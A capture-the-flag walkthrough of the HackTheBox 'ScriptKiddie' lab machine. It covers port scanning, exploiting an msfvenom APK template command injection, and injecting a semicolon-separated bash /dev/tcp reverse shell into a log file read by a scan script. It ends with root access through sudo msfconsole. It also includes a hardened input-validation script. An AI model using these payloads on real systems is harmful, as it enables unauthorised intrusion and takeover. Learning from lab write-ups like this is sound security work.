ScriptKiddie HackTheBox WalkThrough
This is the ScriptKiddie HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted the HackTheBox machine. Before starting, let us know something about this machine. It is a Linux OS box with IP address 10.10.10.226 and difficulty easy assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and make sure of your connectivity with the ScriptKiddie machine by pinging its IP 10.10.10.226. If all goes correctly, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how we have to proceed further. For instance, it helps in banner-grabbing the services running over different ports, and sometimes it also helps in finding vulnerabilities without much effort. I have used nmap for this task and the result is given below:
$ sudo nmap -sC -p- -T3 -sV -oA nmap/full_scan 10.10.10.226
$ cat nmap/full_scan.nmap
The full port scan found ports 22 and 5000 as open. OpenSSH 8.2p1 on port 22 and the Werkzeug web server on port 5000 are running. Enumeration on port 22 is useless until we get some known users. Also, OpenSSH 8.2p1 is not affected by any well-known vulnerability which would help us in further enumeration. So leave it here and move forward to enumeration on port 5000. Since an httpd server is running on this port, there should also be some website running on it. The website can be accessed at the URL http://10.10.10.226:5000. But before accessing the site, let us check Werkzeug 0.16.1 in searchsploit for known vulnerabilities. No vulnerability is found for this version.
Enumerating on Port 5000
On going to the URL http://10.10.10.226:5000, I found a dynamic website with several tools installed on it, including searchsploit. Anyone can use these tools to scan any site and make msfvenom payloads.
I simply tried to test the functionality of the payloads and found that we can make a payload for Android using this tool on the site. It also gives us the feature to upload a template file in the given format. As soon as I saw this file upload feature, I tried to upload a PHP file and files of other formats which generally execute on a web server, but could not succeed; this is because the site allows only .apk files to be uploaded.
After some googling and a bit of research, I found an exploit for Metasploit Framework 6.0.11. According to this exploit, Metasploit Framework's msfvenom payload generator is affected by an APK Template Command Injection Vulnerability when a crafted APK file is used as an Android payload template. The affected versions are 6.0.11 and below in the Community edition and 4.18.0 and below in the Pro edition. For more info about this exploit check here; its Metasploit module is present in the Rapid7 repository.
Currently we don't know the installed version of Metasploit on this machine, but it is worth giving it a try. When I created an apk payload and uploaded that payload as the template, I could easily exploit the vulnerability and get a shell. This confirms that the installed version of Metasploit is less than or equal to 6.0.11. So to exploit this vulnerability and get a shell, follow the given steps.
1. Create the msf.apk payload using the module unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection. If your Metasploit doesn't have this module, first update it to the latest version, or explicitly download the module from the Rapid7 repo, add it to your Metasploit modules folder, and don't forget to update the database after adding it.
Creating APK Payload
msf6 > search metasploit_msfvenom_apk_template
msf6 > use 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.13
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
$ sudo mv /root/.msf4/local/msf.apk .
2. Once you have created the msf.apk payload, start a netcat listener in your terminal, and in the browser create a payload by choosing the OS as android, the lhost as your tun0 IP, and the msf.apk file as the template file.
3. Finally, click on the generate button to execute the msf.apk file. If all goes correctly, you will have a shell on your netcat listener.
Getting User Shell
$ nc -nvlp 4444
$ whoami && id
We have got a user shell as user kid. Let us upgrade it to a fully interactive Linux shell so that we can execute more advanced Linux commands through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z # CTRL + Z to background the shell
$ stty raw -echo
$ fg # To foreground the shell
We have successfully upgraded our Linux shell. Let us capture the user flag from the user.txt file.
Capture User Flag
$ cat /home/kid/user.txt
After some initial enumeration I found another user, pwn, in the home directory, and it has a file scanlosers.sh. This file accepts input from the hackers file located in the /home/kid/logs/ directory, performs some sanitization, and then runs an nmap scan. If you analyze the code carefully, you will find a command injection vulnerability at the point where it accepts input from the hackers file. We can exploit this vulnerability by using the concatenating character ; (semicolon). Since the hackers file is owned by user pwn, we will get a shell as user pwn if we get a shell by exploiting this command injection vulnerability.
$ cat /home/pwn/scanlosers.sh
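The weakness described above is the classic "log line interpolated into a scanner command" pattern. Below is an added, hardened illustration of that pattern, not the machine's scanlosers.sh and not code from the box's author: it allow-lists the field that is supposed to hold an IP before anything is passed to nmap, so a line carrying a ; separator is dropped instead of executed. The log format assumed here (source IP in the third whitespace-separated field) and the nmap flags are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not the machine's scanlosers.sh. Hardened form of the
# "read addresses from a log file, then scan them" pattern. The log format
# (IP in the third field) is an assumption made for this illustration.

# is_ipv4 TOKEN: succeed only if TOKEN is exactly one dotted quad with every
# octet in 0-255. Anything else (";", quotes, "$(...)", extra text) fails.
is_ipv4() {
    printf '%s' "$1" | grep -Eqx \
        '((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])'
}

# extract_ips LOGFILE: print the validated third field of each line, one per
# line. Lines whose third field is not a bare IPv4 address are dropped, so
# injected shell syntax never reaches a command line.
extract_ips() {
    awk '{ print $3 }' "$1" | while IFS= read -r tok; do
        if is_ipv4 "$tok"; then
            printf '%s\n' "$tok"
        fi
    done
}

# safe_scan LOGFILE: hand each validated IP to nmap as its own argument.
# No eval, no sh -c, no interpolation into a string that a shell re-parses.
safe_scan() {
    extract_ips "$1" | while IFS= read -r ip; do
        nmap -Pn -p 22,5000 "$ip"    # flags are illustrative only
    done
}

# demo: constructed input mixing one legitimate entry with lines that mimic
# the ";" trick used in this writeup. Only the clean address is printed.
demo() {
    f=$(mktemp) || return 1
    printf '%s\n' \
        '2021-02-01 10:00:00 10.10.14.13' \
        'a b ;/bin/bash -c id #' \
        'c d 10.10.14.13;id' \
        'e f 300.1.1.1' > "$f"
    extract_ips "$f"
    rm -f "$f"
}
```

The important design choice is that the validated value is passed to nmap as a separate argv element rather than spliced into a string that is later re-parsed by a shell; the regex allow-list is a second layer, not the only one. Running demo prints just 10.10.14.13.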
To exploit this vulnerability and get a shell as user pwn, do the following.
$ cd /home/kid/logs/
$ ls -la
$ echo "a b ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4321 0>&1' #" >> hackers
$ nc -nvlp 4321
$ whoami && id
We are the pwn user now; let us find the PrivEsc vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l
The sudo -l command shows that user pwn can run /opt/metasploit-framework-6.0.9/msfconsole as root (the path also confirms that the installed Metasploit version, 6.0.9, is within the affected range noted earlier). When I executed msfconsole as root, I could easily spawn a root shell from within msfconsole. So here our privilege escalation vector is sudo-rights exploitation.
Let us get a root shell.
Getting Root Shell
$ sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6 > /bin/bash -i
# whoami && id
We are root now. Let us capture the root flag from the root.txt file.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the ScriptKiddie HackTheBox machine. I learnt a lot during this challenge and hope you guys have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.